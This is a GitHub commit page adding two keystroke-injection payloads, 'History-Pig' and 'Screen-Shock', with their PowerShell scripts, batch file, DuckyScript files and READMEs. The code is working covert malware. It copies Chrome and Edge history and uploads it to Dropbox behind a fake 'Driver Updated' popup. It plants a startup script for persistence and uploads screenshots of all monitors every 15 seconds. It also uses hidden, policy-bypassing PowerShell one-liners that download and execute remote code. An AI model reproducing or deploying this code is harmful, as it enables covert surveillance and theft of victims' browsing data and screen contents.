Skip to content

Commit

Permalink
New Payload - Screen-Shock (#552)
Browse files Browse the repository at this point in the history 
* Add files via upload

* Update c.ps1

* Add files via upload
  • Loading branch information
@atomiczsec
atomiczsec authored Oct 9, 2022
1 parent fa5dae9 commit a08e9b3
Show file tree
Hide file tree
Showing 8 changed files with 371 additions and 0 deletions.
63 changes: 63 additions & 0 deletions payloads/library/exfiltration/History-Pig/HP.ps1
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,63 @@
#History-Pig

# See if file is a thing
Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf

#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) {
try {
Write-Host "The Chrome History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome History to Temp Directory to get sent to Dropbox
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history"
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1"
}

# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf

#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) {
try {
Write-Host "The Edge History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Edge History to Temp Directory to get sent to Dropbox
else {
$F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history"
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2"
}

function DropBox-Upload {

[CmdletBinding()]
param (

[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}

DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"

$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
109 changes: 109 additions & 0 deletions payloads/library/exfiltration/History-Pig/README.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,109 @@
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;History+Pig!+😈&center=true&size=30">
</a>
</h1>

<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>

# History-Pig

A payload to exfiltrate the history of the 2 most popular browsers

## Description

This payload will enumerate through the browser directories, looking for the file that stores the history

These files will be saved to the temp directory

Finally dropbox will be used to exfiltrate the files to cloud storage

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

<p align="right">(<a href="#top">back to top</a>)</p>

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

<p align="right">(<a href="#top">back to top</a>)</p>

## Contributing

All contributors names will be listed here

atomiczsec
I am Jakoby

<p align="right">(<a href="#top">back to top</a>)</p>

## Version History

* 0.1
* Initial Release

<p align="right">(<a href="#top">back to top</a>)</p>

<!-- CONTACT -->
## Contact

<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>

<p align="right">(<a href="#top">back to top</a>)</p>




<p align="right">(<a href="#top">back to top</a>)</p>

<!-- ACKNOWLEDGMENTS -->
## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

<p align="right">(<a href="#top">back to top</a>)</p>
16 changes: 16 additions & 0 deletions payloads/library/exfiltration/History-Pig/payload.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
REM Title: History-Pig

REM Author: atomiczsec

REM Description: This payload is meant to exfiltrate browsers history to a dropbox

REM Target: Windows 10, 11

DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER

REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
3 changes: 3 additions & 0 deletions payloads/library/exfiltration/Screen-Shock/I.bat
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause
117 changes: 117 additions & 0 deletions payloads/library/exfiltration/Screen-Shock/README.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,117 @@
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png" width="200">

<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Screen+Shock!+😈&center=true&size=30">
</a>
</h1>

<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>

# Screen-Shock

This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)

## Description

This payload uses iwr to download 2 files
* I.bat
* c.ps1

**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup

**c.ps1** will sit in AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds

Then the contents will then be sent to the DropBox for viewing pleasure



## Getting Started

### Dependencies

* Pastebin or other file sharing service, Dropbox
* Windows 10
* [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload

<p align="right">(<a href="#top">back to top</a>)</p>

### Executing program

* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```

<p align="right">(<a href="#top">back to top</a>)</p>

## Contributing

All contributors names will be listed here:

[atomiczsec](https://github.com/atomiczsec)

<p align="right">(<a href="#top">back to top</a>)</p>

## Version History

* 0.1
* Initial Release

<p align="right">(<a href="#top">back to top</a>)</p>

<!-- CONTACT -->
## Contact

<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>

<p align="right">(<a href="#top">back to top</a>)</p>




<p align="right">(<a href="#top">back to top</a>)</p>

<!-- ACKNOWLEDGMENTS -->
## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

<p align="right">(<a href="#top">back to top</a>)</p>
45 changes: 45 additions & 0 deletions payloads/library/exfiltration/Screen-Shock/c.ps1
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,45 @@
function DropBox-Upload {

[CmdletBinding()]
param (

[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}

while(1){

Add-Type -AssemblyName System.Windows.Forms,System.Drawing

$screens = [Windows.Forms.Screen]::AllScreens

$top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum
$left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum
$width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum
$height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum

$bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height)
$bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height)
$graphics = [Drawing.Graphics]::FromImage($bmp)

$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)

$bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png")
$graphics.Dispose()
$bmp.Dispose()

start-sleep -Seconds 15
"$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload
}
17 changes: 17 additions & 0 deletions payloads/library/exfiltration/Screen-Shock/payload.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
REM Title: Screen-Shock

REM Author: atomiczsec

REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)

REM Target: Windows 10

DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER

REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
1 change: 1 addition & 0 deletions payloads/library/exfiltration/Screen-Shock/placeholder
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@

0 comments on commit a08e9b3

Please sign in to comment.